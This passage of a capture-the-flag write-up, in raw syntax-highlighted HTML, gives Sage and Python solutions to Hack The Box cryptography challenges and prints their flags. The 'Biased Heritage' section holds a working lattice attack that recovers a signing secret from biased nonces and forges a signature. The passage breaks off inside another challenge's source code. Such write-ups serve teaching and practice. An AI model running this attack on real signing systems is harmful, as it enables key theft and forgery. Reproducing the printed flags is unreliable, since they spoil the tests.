<span class="n">b_l</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">iv</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="n">sha256</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">p</span><span class="p">)))</span><span class="o">.</span><span class="n">digest</span><span class="p">()[:</span><span class="mi">16</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">cipher</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">AES</span><span class="o">.</span><span class="n">MODE_CBC</span><span class="p">,</span> <span class="n">iv</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">enc</span> <span class="o">=</span> <span class="nb">bytes</span><span class="o">.</span><span class="n">fromhex</span><span class="p">(</span><span class="n">enc</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">cipher</span><span class="o">.</span><span class="n">decrypt</span><span class="p">(</span><span class="n">enc</span><span class="p">))</span> </span></span></code></pre></div><p>Flag is: <strong>HTB{y0u_5h0u1d_h4v3_u53d_c00p325m17h}</strong></p> <h2 id="biased-heritage">Biased Heritage</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://github.com/sudo-rainman/ctf_script/tree/main/htb_cyberapocalypse2023/crypto_biased_heritage" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> You emerge from the labyrinth to find a massive door blocking your path to the relic. It has the same authentication mechanism as the entrance, but it appears to be more sophisticated and challenging to crack. Can you devise a plan to breach the door and gain access to the relic?</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Hard</p> </li> </ul> <p>Compared to the last challenge (Colliding Heritage), <code>k</code> is now generated by <code>SHA256</code> insteads which is much more resilient against hash collision attacks than <code>MD5</code> or nearly impossible to do so. Because of that, our previous attack wouldn&rsquo;t work on this challenge.</p> <p>After noticing the word <code>BIASED</code> in the challenge name, I had a hunch that this chall gonna need some LLL magic. Based on that, I kept looking for a small integer or atleast any repetitive parts of a number (or so called bias), and found one in the followng hashing function.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">H</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">msg</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">bytes_to_long</span><span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">sha256</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span><span class="o">.</span><span class="n">digest</span><span class="p">())</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">q</span> </span></span></code></pre></div><p>You can easily see that <code>k = 2*SHA256( msg || secret )</code>. In other words, <code>k = (2^256+1)\*x</code> where x is unknown <code>256-bit</code> output from <code>SHA256</code> function while k is <code>512-bit</code>. Bingo, LLL time.</p> <p>Well, the server allows us to query for 3 times, we should use the first 2 times to collect signatures which are just enough for our use and the last ones to trick the server into giving us the flag. So we got:</p> <img src="equations.png" alt="Ảnh thì như này" width="1000"/> <p>Since <code>S</code> is known <code>512-bit</code>, and <code>k</code> only has <code>256</code> unknown bits we can start constructing a lattice to solve the SVP problem with LLL now.</p> <img src="matrix.png" alt="Ảnh thì như này" width="1000"/> <p>After LLL, we gonna get a short vector that look like this:</p> <img src="vector.png" alt="Ảnh thì như này" width="200"/> <p>Well, that was alot. Here comes the script in Sage (I parsed signature and submitted signatures all by hands):</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">sha256</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">Crypto.Util.number</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">##get 2 signature from server </span> </span></span><span class="line"><span class="cl"><span class="n">sig0</span> <span class="o">=</span> <span class="p">(</span><span class="mi">2201384718072843790141885598870601009149158537568071358193592308444053168306421929467556420242693286691490522215468964110881851509880735493338991645390396</span><span class="p">,</span> <span class="mi">2318623387388989624095214099569047825341708399431253151627450383635519224666598718188372928127571765685778247137818236688391434765968118358634695411837390</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">sig1</span> <span class="o">=</span> <span class="p">(</span><span class="mi">5643323405968098617359379045374815314162245377024975944768494215044558381083529231024356935255866448701807811319414715896126937899577482072265546826687923</span><span class="p">,</span> <span class="mi">1027133811051642261997157563892411730891386064630632377323975878292520406108099727744365069912026927564457147136857066971987676141520708801237151093219205</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">s_temp</span><span class="o">=</span> <span class="p">[</span><span class="n">sig0</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">sig1</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> </span></span><span class="line"><span class="cl"><span class="n">e_temp</span><span class="o">=</span> <span class="p">[</span><span class="n">sig0</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">sig1</span><span class="p">[</span><span class="mi">1</span><span class="p">]]</span> </span></span><span class="line"><span class="cl"><span class="c1"># q prime</span> </span></span><span class="line"><span class="cl"><span class="n">q</span><span class="o">=</span> <span class="p">[</span><span class="mi">10183765261512984706477412009638081602843766654569849535936436797593873507566983996455981325952833624810053852919430991796953569087107929681393648627640673</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">preal</span> <span class="o">=</span> <span class="mh">0x184e26a581fca2893b2096528eb6103ac03f60b023e1284ebda3ab24ad9a9fe0e37b33eeecc4b3c3b9e50832fd856e9889f6c9a10cde54ee798a7c383d0d8d2c3</span> </span></span><span class="line"><span class="cl"><span class="n">g</span><span class="o">=</span><span class="mi">3</span> </span></span><span class="line"><span class="cl"><span class="n">s0</span><span class="o">=</span> <span class="n">s_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">*</span><span class="n">inverse</span><span class="p">(</span><span class="n">e_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">s1</span><span class="o">=</span> <span class="n">s_temp</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">*</span><span class="n">inverse</span><span class="p">(</span><span class="n">e_temp</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">temp0</span> <span class="o">=</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">256</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">*</span><span class="n">inverse</span><span class="p">(</span><span class="n">e_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">temp1</span> <span class="o">=</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">256</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">*</span><span class="n">inverse</span><span class="p">(</span><span class="n">e_temp</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span><span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">S</span> <span class="o">=</span> <span class="p">(</span><span class="n">s0</span><span class="o">-</span><span class="n">s1</span><span class="p">)</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">m</span> <span class="o">=</span> <span class="n">Matrix</span><span class="p">([[</span><span class="mi">1</span><span class="o">/</span><span class="mi">2</span><span class="o">^</span><span class="mi">256</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="o">-</span><span class="n">temp0</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="o">/</span><span class="mi">2</span><span class="o">^</span><span class="mi">256</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">temp1</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">S</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]]])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">res</span> <span class="o">=</span> <span class="n">m</span><span class="o">.</span><span class="n">LLL</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">H</span><span class="p">(</span><span class="n">msg</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">bytes_to_long</span><span class="p">(</span><span class="mi">2</span> <span class="o">*</span> <span class="n">sha256</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span><span class="o">.</span><span class="n">digest</span><span class="p">())</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">sign</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">msg</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;q0 here&#34;</span><span class="p">,</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">k</span> <span class="o">=</span> <span class="n">H</span><span class="p">(</span><span class="n">msg</span> <span class="o">+</span> <span class="n">long_to_bytes</span><span class="p">(</span><span class="n">x</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">r</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">pow</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="n">k</span><span class="p">,</span><span class="n">preal</span><span class="p">))</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">e</span> <span class="o">=</span> <span class="n">H</span><span class="p">(</span><span class="n">long_to_bytes</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="o">+</span> <span class="n">msg</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="p">(</span><span class="n">k</span> <span class="o">-</span> <span class="n">x</span> <span class="o">*</span> <span class="n">e</span><span class="p">)</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">res</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">or</span> <span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">k0</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">k0</span><span class="o">.</span><span class="n">numerator</span><span class="p">()</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">k0</span> <span class="o">=</span> <span class="o">-</span><span class="n">k0</span> </span></span><span class="line"><span class="cl"> <span class="n">k0</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">k0</span><span class="o">.</span><span class="n">numerator</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="n">k0</span> <span class="o">=</span> <span class="n">k0</span><span class="o">*</span><span class="p">(</span><span class="mi">2</span><span class="o">^</span><span class="mi">256</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">secret</span> <span class="o">=</span> <span class="p">(</span><span class="n">k0</span> <span class="o">-</span> <span class="n">s_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">secret</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">secret</span><span class="o">*</span><span class="n">inverse</span><span class="p">(</span><span class="n">e_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="o">%</span> <span class="n">q</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">temp</span> <span class="o">=</span> <span class="n">sign</span><span class="p">(</span><span class="n">secret</span><span class="p">,</span><span class="sa">b</span><span class="s2">&#34;&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">assert</span> <span class="n">s_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="n">temp</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="k">assert</span> <span class="n">e_temp</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="n">temp</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">b</span><span class="s2">&#34;right hand&#34;</span><span class="o">.</span><span class="n">hex</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">sign</span><span class="p">(</span><span class="n">secret</span><span class="p">,</span><span class="sa">b</span><span class="s2">&#34;right hand&#34;</span><span class="p">))</span> </span></span></code></pre></div><p>Flag is: <strong>HTB{full_s1z3_n0nc3_l4cks_ful1_s1z3_3ntr0py}</strong></p> <h2 id="converging-visions">Converging Visions</h2> <ul> <li> <p><strong>Description:</strong> As you hold the relic in your hands, it prompts you to input a coordinate. The ancient scriptures you uncovered near the pharaoh&rsquo;s tomb reveal that the artifact is capable of transmitting the locations of vessels. The initial coordinate must be within proximity of the vessels, and an algorithm will then calculate their precise locations for transmission. However, you soon discover that the coordinates transmitted are not correct, and are encrypted using advanced alien techniques to prevent unauthorized access. It becomes clear that the true coordinates are hidden, serving only to authenticate those with knowledge of the artifact&rsquo;s secrets. Can you decipher this alien encryption and uncover the genuine coordinates to locate the vessels and destroy them?</p> </li> <li> <p><strong>Category:</strong> Cryptography</p> </li> <li> <p><strong>Difficulty:</strong> Hard</p> </li> </ul> <p>We are given a Python script.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">secret</span> <span class="kn">import</span> <span class="n">FLAG</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">sage.all_cmdline</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">PRNG</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">mul1</span><span class="p">,</span> <span class="n">mul2</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">mod</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="mi">6089788258325039501929073418355467714844813056959443481824909430411674443639248386564763122373451773381582660411059922334086996696436657009055324008041039</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">exp</span> <span class="o">=</span> <span class="mi">2</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">mul1</span> <span class="o">=</span> <span class="n">mul1</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">mul2</span> <span class="o">=</span> <span class="n">mul2</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">inc</span> <span class="o">=</span> <span class="nb">int</span><span class="o">.</span><span class="n">from_bytes</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;Coordinates lost in space&#39;</span><span class="p">,</span> <span class="s1">&#39;big&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">seed</span> <span class="o">=</span> <span class="n">randint</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">mod</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">rotate</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">seed</span> <span class="o">=</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">mul1</span> <span class="o">*</span> <span class="nb">pow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">seed</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span> <span class="o">+</span> <span class="bp">self</span><span class="o">.</span><span class="n">mul2</span> <span class="o">*</span> <span class="bp">self</span><span class="o">.</span><span class="n">seed</span> <span class="o">+</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">inc</span><span class="p">)</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">mod</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="bp">self</span><span class="o">.</span><span class="n">seed</span><span class="p">,</span> <span class="nb">pow</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">seed</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">exp</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">mod</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">class</span> <span class="nc">Relic</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">p</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">E</span> <span class="o">=</span> <span class="n">EllipticCurve</span><span class="p">(</span><span class="n">GF</span><span class="p">(</span><span class="n">p</span><span class="p">),</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">P</span> <span class="o">=</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">EP</span> <span class="o">=</span> <span class="kc">None</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">p</span> <span class="o">=</span> <span class="n">p</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">prng</span> <span class="o">=</span> <span class="n">PRNG</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">setupPoints</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">x</span> <span class="o">&gt;=</span> <span class="bp">self</span><span class="o">.</span><span class="n">p</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="s1">&#39;Coordinate greater than curve modulus&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">P</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">E</span><span class="o">.</span><span class="n">lift_x</span><span class="p">(</span><span class="n">Integer</span><span class="p">(</span><span class="n">x</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">EP</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">P</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="s1">&#39;Point not on curve&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="s1">&#39;Point confirmed on curve&#39;</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">P</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="bp">self</span><span class="o">.</span><span class="n">P</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">def</span> <span class="nf">nextPoints</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">seed</span><span class="p">,</span> <span class="n">enc_seed</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">prng</span><span class="o">.</span><span class="n">rotate</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">P</span> <span class="o">*=</span> <span class="n">seed</span> </span></span><span class="line"><span class="cl"> <span class="bp">self</span><span class="o">.</span><span class="n">EP</span> <span class="o">*=</span> <span class="n">enc_seed</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="p">(</span><span class="s1">&#39;New Points&#39;</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">EP</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="bp">self</span><span class="o">.</span><span class="n">EP</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="bp">self</span><span class="o">.</span><span class="n">P</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="bp">self</span><span class="o">.</span><span class="n">P</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">menu</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Options:</span><span class="se">\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;1. Setup Point&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;2. Receive new point&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;3. Find true point&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">option</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s1">&#39;&gt; &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">option</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">main</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">artifact</span> <span class="o">=</span> <span class="n">Relic</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">setup</span> <span class="o">=</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">option</span> <span class="o">=</span> <span class="n">menu</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">option</span> <span class="o">==</span> <span class="s1">&#39;1&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Enter x coordinate&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">x</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;x: &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">artifact</span><span class="o">.</span><span class="n">setupPoints</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;Point confirmed on curve&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">setup</span> <span class="o">=</span> <span class="kc">True</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="n">response</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">option</span> <span class="o">==</span> <span class="s1">&#39;2&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">setup</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">artifact</span><span class="o">.</span><span class="n">nextPoints</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Response&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">((</span><span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">response</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">response</span><span class="p">[</span><span class="mi">2</span><span class="p">]))</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Configure origin point first&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">elif</span> <span class="n">option</span> <span class="o">==</span> <span class="s1">&#39;3&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">setup</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s1">&#39;Input x,y&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">Px</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;x: &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">Py</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">input</span><span class="p">(</span><span class="s1">&#39;y: &#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">response</span> <span class="o">=</span> <span class="n">artifact</span><span class="o">.</span><span class="n">nextPoints</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">response</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">==</span> <span class="n">Px</span> <span class="ow">and</span> <span class="n">response</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="n">Py</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s1">&#39;You have confirmed the location. It</span><span 